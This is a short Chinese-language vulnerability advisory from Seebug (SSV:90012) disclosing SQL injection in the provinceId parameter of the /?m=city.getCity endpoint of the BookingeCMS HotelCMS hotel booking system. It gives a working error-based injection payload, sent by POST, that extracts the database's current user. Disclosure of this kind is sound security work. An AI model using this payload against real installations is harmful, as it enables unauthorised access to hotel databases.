BookingeCMS HotelCMS酒店预订管理系统provinceId参数存在注入

2015-12-07T00:00:00
ID SSV:90012
Type seebug
Reporter Root
Modified 2015-12-07T00:00:00

Description

0x01 漏洞简述

提交时间: 2015-09-04 13:33

公开时间: 2015-12-06 09:00

漏洞类型: SQL注射漏洞

珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=city.getCity 文件provinceId参数存在注入

0x02 漏洞利用

测试Payload: (post提交)

/?m=city.getCity

provinceId=1' AND (SELECT 7525 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IOvh'='IOvh&pageSize=0&json=true

![](https://images.seebug.org/contribute/06e7b351-908a-42f3-8f11-c49c5d76394a-2015-12-07 14_40_11.jpg)

0x03 参考链接

http://www.wooyun.org/bugs/wooyun-2010-0137378